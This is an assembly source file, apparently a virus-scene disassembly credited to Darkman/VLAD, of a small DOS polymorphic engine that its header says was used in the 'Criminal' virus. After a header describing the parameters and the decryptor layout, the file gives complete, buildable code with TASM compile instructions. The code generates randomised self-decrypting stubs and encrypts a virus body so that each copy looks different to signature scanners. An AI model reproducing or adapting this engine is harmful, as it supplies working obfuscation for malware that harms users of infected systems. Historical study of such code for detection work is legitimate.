comment *
                 Small Polymorphic Engine [SPE] v 0.01
                  (Used in Criminal by Wild W0rker/DC)
                             Disassembly by
                              Darkman/VLAD

                 Calling parameters:
                   AL     Flags
                   CX     Length of plain code
                   BP     Decryptors offset
                   DS:SI  Pointer to plain code
                   ES:DI  Pointer to decryptor + encrypted code

                 Return parameters:
                   CX     Length of decryptor + encrypted code

Flags:
  xxxxxxx1  Generate CS: a front of the decryption opcode.
  1111111x  Unused.

Small Polymorphic Engine decryptor:
  MOV BX,imm16; MOV DI,imm16; MOV SI,imm16       (Beginning of encrypted code)
  MOV CX,imm16                         (If bit 1 of 'loop_flags' is turned on)
  CS:                                       (If bit 1 of 'flags' is turned on)
  ADD [BX],imm8; ADD [DI],imm8; ADD [SI],imm8; NEG [BX]; NEG [DI]; NEG [SI]...
  CMP BX,imm16; MOV DI,imm16; MOV SI,imm16             (End of encrypted code)
  JE imm8           (If bit 1 of 'loop_flags' is turned off. End of JMP imm16)
  LODSB                                            (50% chance if SI was used)
  SCASB                                            (50% chance if DI was used)
  INC BX; INC DI; INC SI
  LOOP imm8                            (If bit 1 of 'loop_flags' is turned on)
  JMP imm16         (If bit 1 of 'loop_flags' is turned off. Beginning of CS:)

Min. decryptor size:            11 bytes.
Max. decryptor size:            16 bytes.

Small Polymorphic Engine size: 380 bytes.

Compile Small Polymorphic Engine with Turbo Assembler v 4.0 by typing:
  TASM /M2 SPE.ASM

*

public       spe,speend,rndget           ; Public procedures and labels

.model tiny
.code

code_begin:
spe          proc    near                ; Small Polymorphic Engine
             xor     di,di               ; Zero DI

             mov     cs:[plain_off],si   ; Store offset of plain code
             mov     cs:[plain_seg],ds   ; Store segment of plain code

             push    cs                  ; Save CS at stack
             pop     ds                  ; Load DS from stack (CS)

             mov     [plain_length],cx   ; Store length of plain code
             mov     [flags],al          ; Store flags

             mov     ah,04h              ; Random number between 0 and 4
             call    rndget
             mov     [random_algo],al    ; Store 8-bit random number

             mov     ah,02h              ; Random number between 0 and 2
             call    rndget
             mov     [random_reg16],al   ; Store 8-bit random number

             mov     al,0b8h             ; MOV AX,imm16 (opcode 0b8h)
             mov     bl,[random_reg16]   ; BL = index register number
             xor     bh,bh               ; Zero BH
             or      al,[bx+reg16ortable]
             stosb                       ; Store MOV reg16,imm16
             mov     [movreg16_off],di   ; Store offset of MOV reg16,imm16
             add     di,02h              ; Add size of immediate

             mov     ah,01h              ; Random number between 0 and 1
             call    rndget
             mov     [loop_flags],al     ; Store loop flags

             or      al,al               ; Generate MOV CX,imm16?
             jz      test_cs             ; Zero? Jump to test_cs

             mov     al,0b9h             ; MOV CX,imm16 (opcode 0b9h)
             stosb                       ; Store MOV CX,imm16
             mov     ax,[plain_length]   ; AX = length of plain code
             stosw                       ; Store length of plain code
test_cs:
             test    [flags],00000001b   ; Generate CS:?
             jz      gen_decrypt         ; Zero? Jump to gen_decrypt

             mov     al,2eh              ; CS: (opcode 2eh)
             stosb                       ; Store CS:
gen_decrypt:
             mov     bl,[random_algo]    ; BL = decryption algorithme number
             shl     bx,01h              ; Multiply by 2
             mov     ax,[bx+decrypttable]

             mov     bl,[random_reg16]   ; BL = index register number
             or      al,[bx+decryptortab]
             xchg    al,ah               ; Exchange AL with AH
             stosw                       ; Store decryption opcode

             cmp     [random_algo],02h   ; Generate encryption/decryption key?
             ja      test_cmp_r16        ; Above? Jump to test_cmp_r16

             call    rndplainget
             mov     [decrypt_key],al    ; Store encryption/decryption key
             stosb                       ;   "       "     "    "       "
test_cmp_r16:
             cmp     [loop_flags],01h    ; Generate CMP reg16,imm16?
             je      test_lod_sca        ; Equal? Jump to test_lod_sca

             mov     al,81h              ; CMP reg16,imm16 (opcode 081h)
             stosb                       ; Store CMP reg16,imm16

             mov     al,0f8h             ; CMP AX,imm16 (opcode 081h,0f8h)
             or      al,[bx+reg16ortable]
             stosb                       ; Store CMP reg16,imm16
             mov     [cmpreg16_off],di   ; Store offset of CMP reg16,imm16
             add     di,02h              ; Add size of immediate

             mov     al,74h              ; JE imm8 (opcode 74h)
             stosb                       ; Store JE imm8
             mov     [je_imm8_off],di    ; Store offset of JE imm8
             inc     di                  ; Add size of immediate
test_lod_sca:
             mov     ah,0ffh             ; Random number between 0 and 255
             call    rndget
             cmp     al,80h              ; Generate LODSB/SCASB?
             jb      gen_inc_r16         ; Below? Jump to gen_inc_r16

             cmp     [random_reg16],00h  ; Source index (SI)?
             jne     test_scasb          ; Not equal? Jump to test_scasb

             mov     al,0ach             ; LODSB (opcode 0ach)
             stosb                       ; Store LODSB

             jmp     test_loop
test_scasb:
             cmp     [random_reg16],01h  ; Destination index (DI)?
             jne     gen_inc_r16         ; Not equal? Jump to gen_inc_r16

             mov     al,0aeh             ; SCASB (opcode 0aeh)
             stosb                       ; Store SCASB

             jmp     test_loop
gen_inc_r16:
             mov     al,40h              ; INC AX (opcode 40h)
             or      al,[bx+reg16ortable]
             stosb                       ; Store INC reg16
test_loop:
             cmp     [loop_flags],01h    ; Generate LOOP imm8?
             jne     gen_jmp_i16         ; Not equal? Jump to gen_jmp_i16

             mov     al,0e2h             ; LOOP imm8 (opcode 0e2h)
             stosb                       ; Store LOOP imm8

             mov     ax,[movreg16_off]   ; AX = offset of MOV reg16,imm16
             add     ax,04h              ; Add size of opcode
             sub     ax,di               ; Subtract offset of encrypted code
             stosb                       ; Store immediate of LOOP imm8

             jmp     gen_immediat
gen_jmp_i16:
             mov     al,0e9h             ; JMP imm16 (opcode 0e9h)
             stosb                       ; Store JMP imm16

             mov     ax,[movreg16_off]   ; AX = offset of MOV reg16,imm16
             sub     ax,di               ; Subtract offset of encrypted code
             stosw                       ; Store immediate of JMP imm16
gen_immediat:
             mov     bx,[movreg16_off]   ; BX = offset of MOV reg16,imm16
             mov     ax,di               ; AX = offset of encrypted code
             add     ax,bp               ; Add decryptors offset
             mov     es:[bx],ax          ; Store immediate of MOV reg16,imm16

             cmp     [loop_flags],01h    ; Generate immediate of CMP reg16...?
             je      encrypt_ret         ; Equal? Jump to encrypt_ret

             mov     ax,di               ; AX = offset of encrypted code
             add     ax,[plain_length]   ; Add length of plain code
             add     ax,bp               ; Add decryptors offset
             mov     bx,[cmpreg16_off]   ; BX = offset of CMP reg16,imm16
             mov     es:[bx],ax          ; Store immediate of CMP reg16,imm16

             mov     bx,[je_imm8_off]    ; BX = offset of JE imm8
             push    di                  ; Save DI at stack
             sub     di,bx               ; Subtract offset of JE imm8
             dec     di                  ; Decrease DI
             xchg    di,bx               ; Exchange DI with BX
             mov     al,bl               ; AL = immediate of JE imm8
             stosb                       ; Store immediate of JE imm8
             pop     di                  ; Load DI from stack
encrypt_ret:
             call    gen_encrypt
             mov     cx,di               ; CX = length of decryptor + encry...

             ret                         ; Return!
             endp

gen_encrypt  proc    near                ; Generate encryptor
             xor     bx,bx               ; Zero BX
             mov     bl,[random_algo]    ; BL = encryption algorithme number
             mov     ah,[bx+encrypttable]

             cmp     bl,03h              ; Generate NEG/NOT AL (opcode 0f6h)
             jb      gen_key             ; Below? Jump to gen_key

             mov     al,0f6h             ; NEG/NOT AL (opcode 0f6h)
             mov     word ptr [encrypt_algo],ax

             jmp     encryptor
gen_key:
             mov     [encrypt_algo],ah   ; Store encryption algorithme

             mov     al,[decrypt_key]    ; AL = encryption/decryption key
             mov     [encrypt_key],al    ; Store encryption/decryption key
encryptor:
             mov     cx,[plain_length]   ; CX = length of plain code
             lds     si,dword ptr [plain_off]
encrypt:
             lodsb                       ; Load a byte of plain code
encrypt_algo db      ?                   ; Encryption algorithme
encrypt_key  db      ?                   ; Encryption key
             stosb                       ; Store a byte of encrypted code

             loop    encrypt

             ret                         ; Return!
             endp

rndget       proc    near                ; Get 8-bit random number in range
             call    rndplainget

             cmp     al,ah               ; Random number in range?
             ja      rndget              ; Above? Jump to rndget

             ret                         ; Return!
             endp

rndplainget  proc    near                ; Get 8-bit random number
             in      al,40h              ; AL = 8-bit random number

             nop
             ror     al,01h              ; Rotate AL 1 bit right
             db      04h                 ; ADD AL,imm8
random       db      ?                   ; 8-bit random number

             mov     [random],al         ; Store 8-bit random number

             ret                         ; Return!
             endp

decrypttable dw      8030h               ; XOR [reg16],imm8
             dw      8028h               ; SUB [reg16],imm8
             dw      8000h               ; ADD [reg16],imm8
             dw      0f618h              ; NEG [reg16]
             dw      0f610h              ; NOT [reg16]
encrypttable db      34h                 ; XOR AL,imm8
             db      04h                 ; ADD AL,imm8
             db      2ch                 ; SUB AL,imm8
             db      0d8h                ; NEG AL
             db      0d0h                ; NOT AL
decryptortab db      00000100b           ; Source index (SI)
             db      00000101b           ; Destination index (DI)
             db      00000111b           ; Base (BX)
reg16ortable db      00000110b           ; Source index (SI)
             db      00000111b           ; Destination index (DI)
             db      00000011b           ; Base (BX)
random_reg16 db      ?                   ; Random 16-bit register (BX/DI/SI)
random_algo  db      ?                   ; Random algorithme (ADD/NEG/NOT/S...
movreg16_off dw      ?                   ; Offset of MOV reg16,imm16
cmpreg16_off dw      ?                   ; Offset of CMP reg16,imm16
je_imm8_off  dw      ?                   ; Offset of JE imm8
decrypt_key  db      ?                   ; Encryption/decryption key
plain_length dw      ?                   ; Length of plain code
plain_off    dw      ?                   ; Offset of plain code
plain_seg    dw      ?                   ; Segment of plain code
loop_flags   db      ?                   ; Loop flags
flags        db      ?                   ; Flags

speend       equ     $                   ; End of Small Polymorphic Engine
code_end:

end          code_begin
